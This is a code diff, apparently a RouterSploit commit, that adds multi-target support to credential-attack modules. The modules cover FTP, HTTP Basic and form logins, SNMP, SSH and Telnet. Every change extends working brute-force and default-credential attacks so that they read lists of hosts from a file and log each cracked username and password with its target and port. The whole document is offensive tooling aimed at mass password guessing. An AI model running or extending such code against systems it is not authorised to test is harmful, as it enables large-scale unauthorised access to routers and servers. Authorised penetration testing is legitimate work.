Adding support for targets from file.

routersploit/modules/creds/ftp_bruteforce.py

@@ -12,6 +12,7 @@ from routersploit import (
     print_success,
     print_table,
     boolify,
+    multi,
 )
 
 
@@ -27,7 +28,7 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target IP address')
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(21, 'Target port')
 
     threads = exploits.Option(8, 'Number of threads')
@@ -39,6 +40,10 @@ class Exploit(exploits.Exploit):
 
     def run(self):
         self.credentials = []
+        self.attack()
+
+    @multi
+    def attack(self):
         ftp = ftplib.FTP()
         try:
             ftp.connect(self.target, port=int(self.port), timeout=10)
@@ -66,7 +71,7 @@ class Exploit(exploits.Exploit):
 
         if len(self.credentials):
             print_success("Credentials found!")
-            headers = ("Login", "Password")
+            headers = ("Target", "Port", "Login", "Password")
             print_table(headers, *self.credentials)
         else:
             print_error("Credentials not found")
@@ -103,10 +108,10 @@ class Exploit(exploits.Exploit):
                     ftp.login(user, password)
 
                     running.clear()
-                    print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
-                    self.credentials.append((user, password))
+                    print_success("Target: {}:{} {}: Authentication succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
+                    self.credentials.append((self.target, self.port, user, password))
                 except:
-                    print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
+                    print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
 
                 ftp.close()
 

routersploit/modules/creds/ftp_default.py

@@ -11,6 +11,7 @@ from routersploit import (
     print_success,
     print_table,
     boolify,
+    multi,
 )
 
 
@@ -26,7 +27,7 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target IP address')
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(21, 'Target port')
 
     threads = exploits.Option(8, 'Numbers of threads')
@@ -37,6 +38,10 @@ class Exploit(exploits.Exploit):
 
     def run(self):
         self.credentials = []
+        self.attack()
+
+    @multi
+    def attack(self):
         ftp = ftplib.FTP()
         try:
             ftp.connect(self.target, port=int(self.port), timeout=10)
@@ -58,7 +63,7 @@ class Exploit(exploits.Exploit):
 
         if len(self.credentials):
             print_success("Credentials found!")
-            headers = ("Login", "Password")
+            headers = ("Target", "Port", "Login", "Password")
             print_table(headers, *self.credentials)
         else:
             print_error("Credentials not found")
@@ -95,10 +100,10 @@ class Exploit(exploits.Exploit):
                     ftp.login(user, password)
 
                     running.clear()
-                    print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
-                    self.credentials.append((user, password))
+                    print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
+                    self.credentials.append((self.target, self.port, user, password))
                 except:
-                    print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
+                    print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
 
                 ftp.close()
 

routersploit/modules/creds/http_basic_bruteforce.py

 import threading
-import requests
 import itertools
 
 from routersploit import (
@@ -11,7 +10,9 @@ from routersploit import (
     print_success,
     print_table,
     sanitize_url,
+    http_request,
     boolify,
+    multi,
 )
 
 
@@ -27,7 +28,7 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(80, 'Target port')
 
     threads = exploits.Option(8, 'Numbers of threads')
@@ -40,18 +41,17 @@ class Exploit(exploits.Exploit):
 
     def run(self):
         self.credentials = []
+        self.attack()
+
+    @multi
+    def attack(self):
         url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
 
-        try:
-            r = requests.get(url, verify=False)
-        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
-            print_error("Invalid URL format: %s" % url)
-            return
-        except requests.exceptions.ConnectionError:
-            print_error("Connection error: %s" % url)
+        response = http_request(method="GET", url=url)
+        if response is None:
             return
 
-        if r.status_code != 401:
+        if response.status_code != 401:
             print_status("Target is not protected by Basic Auth")
             return
 
@@ -71,7 +71,7 @@ class Exploit(exploits.Exploit):
 
         if len(self.credentials):
             print_success("Credentials found!")
-            headers = ("Login", "Password")
+            headers = ("Target", "Port", "Login", "Password")
             print_table(headers, *self.credentials)
         else:
             print_error("Credentials not found")
@@ -88,14 +88,15 @@ class Exploit(exploits.Exploit):
                 user, password = data.next()
                 user = user.encode('utf-8').strip()
                 password = password.encode('utf-8').strip()
-                r = requests.get(url, auth=(user, password), verify=False)
 
-                if r.status_code != 401:
+                response = http_request(method="GET", url=url, auth=(user, password))
+
+                if response.status_code != 401:
                     running.clear()
-                    print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
-                    self.credentials.append((user, password))
+                    print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
+                    self.credentials.append((self.target, self.port, user, password))
                 else:
-                    print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
+                    print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
             except StopIteration:
                 break
 

routersploit/modules/creds/http_basic_default.py

 import threading
-import requests
 
 from routersploit import (
     exploits,
@@ -12,7 +11,7 @@ from routersploit import (
     sanitize_url,
     boolify,
     http_request,
-    multi
+    multi,
 )
 
 
@@ -28,7 +27,7 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(80, 'Target port') 
     threads = exploits.Option(8, 'Number of threads')
     defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
@@ -82,14 +81,15 @@ class Exploit(exploits.Exploit):
                 line = data.next().split(":")
                 user = line[0].encode('utf-8').strip()
                 password = line[1].encode('utf-8').strip()
-                r = requests.get(url, auth=(user, password), verify=False)
 
-                if r.status_code != 401:
+                response = http_request(method="GET", url=url, auth=(user, password))
+
+                if response.status_code != 401:
                     running.clear()
-                    print_success("Target: {}:{} {}: Authentication succeed!".format(self.target, self.port, name), user, password, verbose=module_verbosity)
+                    print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
                     self.credentials.append((self.target, self.port, user, password))
                 else:
-                    print_error(name, "Target: {}:{} Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, user, password), verbose=module_verbosity)
+                    print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
             except StopIteration:
                 break
 

routersploit/modules/creds/http_form_bruteforce.py

@@ -13,6 +13,7 @@ from routersploit import (
     print_table,
     sanitize_url,
     boolify,
+    multi,
 )
 
 
@@ -28,7 +29,7 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(80, 'Target port')
     threads = exploits.Option(8, 'Number of threads')
     usernames = exploits.Option('admin', 'Username or file with usernames (file://)')
@@ -43,6 +44,10 @@ class Exploit(exploits.Exploit):
 
     def run(self):
         self.credentials = []
+        self.attack()
+
+    @multi
+    def attack(self):
         url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
 
         try:
@@ -85,7 +90,7 @@ class Exploit(exploits.Exploit):
 
         if len(self.credentials):
             print_success("Credentials found!")
-            headers = ("Login", "Password")
+            headers = ("Target", "Port", "Login", "Password")
             print_table(headers, *self.credentials)
         else:
             print_error("Credentials not found")
@@ -155,10 +160,10 @@ class Exploit(exploits.Exploit):
 
                 if l < self.invalid["min"] or l > self.invalid["max"]:
                     running.clear()
-                    print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
-                    self.credentials.append((user, password))
+                    print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
+                    self.credentials.append((self.target, self.port, user, password))
                 else:
-                    print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
+                    print_error(name, "Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
             except StopIteration:
                 break
 

routersploit/modules/creds/http_form_default.py

@@ -12,6 +12,7 @@ from routersploit import (
     print_table,
     sanitize_url,
     boolify,
+    multi,
 )
 
 
@@ -27,7 +28,7 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(80, 'Target port')
     threads = exploits.Option(8, 'Number of threads')
     defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
@@ -41,6 +42,10 @@ class Exploit(exploits.Exploit):
 
     def run(self):
         self.credentials = []
+        self.attack()
+
+    @multi
+    def attack(self):
         url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
 
         try:
@@ -78,7 +83,7 @@ class Exploit(exploits.Exploit):
 
         if len(self.credentials):
             print_success("Credentials found!")
-            headers = ("Login", "Password")
+            headers = ("Target", "Port", "Login", "Password")
             print_table(headers, *self.credentials)
         else:
             print_error("Credentials not found")
@@ -148,10 +153,10 @@ class Exploit(exploits.Exploit):
 
                 if l < self.invalid["min"] or l > self.invalid["max"]:
                     running.clear()
-                    print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
-                    self.credentials.append((user, password))
+                    print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
+                    self.credentials.append((self.target, self.port, user, password))
                 else:
-                    print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
+                    print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
             except StopIteration:
                 break
 

routersploit/modules/creds/snmp_bruteforce.py

@@ -10,6 +10,7 @@ from routersploit import (
     print_success,
     print_table,
     boolify,
+    multi,
 )
 
 
@@ -23,7 +24,7 @@ class Exploit(exploits.Exploit):
         'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
     }
 
-    target = exploits.Option('', 'Target IP address')
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(161, 'Target port')
     threads = exploits.Option(8, 'Number of threads')
     snmp = exploits.Option(wordlists.snmp, 'Community string or file with community strings (file://)')
@@ -32,7 +33,11 @@ class Exploit(exploits.Exploit):
     strings = []
 
     def run(self):
-        self.strings= []
+        self.strings = []
+        self.attack()
+
+    @multi
+    def attack(self):
 
         # todo: check if service is up
 
@@ -46,7 +51,7 @@ class Exploit(exploits.Exploit):
 
         if len(self.strings):
             print_success("Credentials found!")
-            headers = tuple(["Community Strings"])
+            headers = ("Target", "Port", "Community Strings")
             print_table(headers, *self.strings)
         else:
             print_error("Valid community strings not found")
@@ -67,10 +72,10 @@ class Exploit(exploits.Exploit):
 
                 if res[0] is not None:
                     running.clear()
-                    print_success("{}: Valid community string found!".format(name), string, verbose=module_verbosity)
-                    self.strings.append(tuple([string]))
+                    print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
+                    self.strings.append((self.target, self.port, string))
                 else:
-                    print_error("{}: Invalid community string.".format(name), string, verbose=module_verbosity)
+                    print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
 
             except StopIteration:
                 break

routersploit/modules/creds/ssh_bruteforce.py

@@ -12,6 +12,7 @@ from routersploit import (
     print_success,
     print_table,
     boolify,
+    multi,
 )
 
 
@@ -25,7 +26,7 @@ class Exploit(exploits.Exploit):
         'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
     }
 
-    target = exploits.Option('', 'Target IP address')
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(22, 'Target port')
 
     threads = exploits.Option(8, 'Number of threads')
@@ -37,6 +38,10 @@ class Exploit(exploits.Exploit):
 
     def run(self):
         self.credentials = []
+        self.attack()
+
+    @multi        
+    def attack(self):
         ssh = paramiko.SSHClient()
 
         try:
@@ -65,7 +70,7 @@ class Exploit(exploits.Exploit):
 
         if len(self.credentials):
             print_success("Credentials found!")
-            headers = ("Login", "Password")
+            headers = ("Target", "Port", "Login", "Password")
             print_table(headers, *self.credentials)
         else:
             print_error("Credentials not found")
@@ -88,12 +93,12 @@ class Exploit(exploits.Exploit):
                 break
             except paramiko.ssh_exception.SSHException as err:
                 ssh.close()
-                print_error(name, err, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
+                print_error("Target: {}:{} {}: {} Username: '{}' Password: '{}'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity)
             else:
                 running.clear()
 
-                print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
+                print_success("Target: {}:{} {} Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
 
-                self.credentials.append((user, password))
+                self.credentials.append((self.target, self.port, user, password))
 
         print_status(name, 'thread is terminated.', verbose=module_verbosity)

routersploit/modules/creds/ssh_default.py

@@ -11,6 +11,7 @@ from routersploit import (
     print_success,
     print_table,
     boolify,
+    multi,
 )
 
 
@@ -26,7 +27,7 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target IP address')
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(22, 'Target port')
     threads = exploits.Option(8, 'Numbers of threads')
     defaults = exploits.Option(wordlists.defaults, 'User:Pass or file with default credentials (file://)')
@@ -36,6 +37,10 @@ class Exploit(exploits.Exploit):
 
     def run(self):
         self.credentials = []
+        self.attack()
+
+    @multi
+    def attack(self):
         ssh = paramiko.SSHClient()
 
         try:
@@ -59,7 +64,7 @@ class Exploit(exploits.Exploit):
 
         if len(self.credentials):
             print_success("Credentials found!")
-            headers = ("Login", "Password")
+            headers = ("Target", "Port", "Login", "Password")
             print_table(headers, *self.credentials)
         else:
             print_error("Credentials not found")
@@ -83,12 +88,12 @@ class Exploit(exploits.Exploit):
             except paramiko.ssh_exception.SSHException as err:
                 ssh.close()
 
-                print_error(name, err, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
+                print_error("Target: {}:{} {}: {} Username: '{}' Password: '{}'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity)
             else:
                 running.clear()
 
-                print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
+                print_success("Target: {}:{} {} Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
 
-                self.credentials.append((user, password))
+                self.credentials.append((self.target, self.port, user, password))
 
         print_status(name, 'process is terminated.', verbose=module_verbosity)

routersploit/modules/creds/telnet_bruteforce.py

@@ -11,6 +11,7 @@ from routersploit import (
     print_success,
     print_table,
     boolify,
+    multi,
 )
 
 
@@ -24,7 +25,7 @@ class Exploit(exploits.Exploit):
         'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>'  # routersploit module
     }
 
-    target = exploits.Option('', 'Target IP address')
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(23, 'Target port')
 
     threads = exploits.Option(8, 'Number of threads')
@@ -36,7 +37,10 @@ class Exploit(exploits.Exploit):
 
     def run(self):
         self.credentials = []
+        self.attack()
 
+    @multi
+    def attack(self):
         try:
             tn = telnetlib.Telnet(self.target, self.port)
             tn.expect(["login: ", "Login: "], 5)
@@ -60,7 +64,7 @@ class Exploit(exploits.Exploit):
 
         if len(self.credentials):
             print_success("Credentials found!")
-            headers = ("Login", "Password")
+            headers = ("Target", "Port", "Login", "Password")
             print_table(headers, *self.credentials)
         else:
             print_error("Credentials not found")
@@ -93,12 +97,12 @@ class Exploit(exploits.Exploit):
                         tn.close()
 
                         if i != -1:
-                            print_error(name, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
+                            print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
                         else:
                             if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500:  # big banner e.g. mikrotik
                                 running.clear()
-                                print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
-                                self.credentials.append((user, password))
+                                print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
+                                self.credentials.append((self.target, self.port, user, password))
                         tn.close()
                         break
                     except EOFError:

routersploit/modules/creds/telnet_default.py

@@ -10,6 +10,7 @@ from routersploit import (
     print_success,
     print_table,
     boolify,
+    multi,
 )
 
 
@@ -25,7 +26,7 @@ class Exploit(exploits.Exploit):
         ]
     }
 
-    target = exploits.Option('', 'Target IP address')
+    target = exploits.Option('', 'Target IP address or file with target:port (file://)')
     port = exploits.Option(23, 'Target port')
 
     threads = exploits.Option(8, 'Numbers of threads')
@@ -36,7 +37,10 @@ class Exploit(exploits.Exploit):
 
     def run(self):
         self.credentials = []
+        self.attack()
 
+    @multi
+    def attack(self):
         try:
             tn = telnetlib.Telnet(self.target, self.port)
             tn.expect(["login: ", "Login: "], 5)
@@ -55,7 +59,7 @@ class Exploit(exploits.Exploit):
 
         if len(self.credentials):
             print_success("Credentials found!")
-            headers = ("Login", "Password")
+            headers = ("Target", "Port", "Login", "Password")
             print_table(headers, *self.credentials)
         else:
             print_error("Credentials not found")
@@ -87,12 +91,12 @@ class Exploit(exploits.Exploit):
                         tn.close()
 
                         if i != -1:
-                            print_error(name, "Username: '{}' Password: '{}'".format(user, password), verbose=module_verbosity)
+                            print_error("Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
                         else:
                             if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500:  # big banner e.g. mikrotik
                                 running.clear()
-                                print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
-                                self.credentials.append((user, password))
+                                print_success("Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
+                                self.credentials.append((self.target, self.port, user, password))
                         tn.close()
                         break
                     except EOFError: